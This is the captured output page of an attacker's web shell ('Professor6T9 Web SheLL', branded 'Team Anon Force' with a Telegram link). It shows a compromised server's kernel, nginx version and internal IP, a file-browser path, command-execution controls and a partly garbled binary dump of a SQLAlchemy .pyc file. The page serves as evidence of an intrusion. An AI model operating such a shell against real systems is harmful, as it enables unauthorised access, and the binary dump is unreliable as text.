GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
sqlalchemy
/
dialects
/
mysql
/
__pycache__
[ HOME ]
Exec
Submit
oursql.cpython-38.pyc
U �}�h� � @ sx d Z ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ G dd � d e�Z G d d� de�Z G dd � d e�ZeZdS )a .. dialect:: mysql+oursql :name: OurSQL :dbapi: oursql :connectstring: mysql+oursql://<user>:<password>@<host>[:<port>]/<dbname> :url: http://packages.python.org/oursql/ .. note:: The OurSQL MySQL dialect is legacy and is no longer supported upstream, and is **not tested as part of SQLAlchemy's continuous integration**. The recommended MySQL dialects are mysqlclient and PyMySQL. Unicode ------- Please see :ref:`mysql_unicode` for current recommendations on unicode handling. � )�BIT)�MySQLDialect)�MySQLExecutionContext� )�types)�utilc @ s e Zd Zdd� ZdS )� _oursqlBITc C s dS )z'oursql already converts mysql bits, so.N� )�self�dialectZcoltyper r �G/tmp/pip-target-hu2ovxdm/lib/python/sqlalchemy/dialects/mysql/oursql.py�result_processor( s z_oursqlBIT.result_processorN)�__name__� __module__�__qualname__r r r r r r '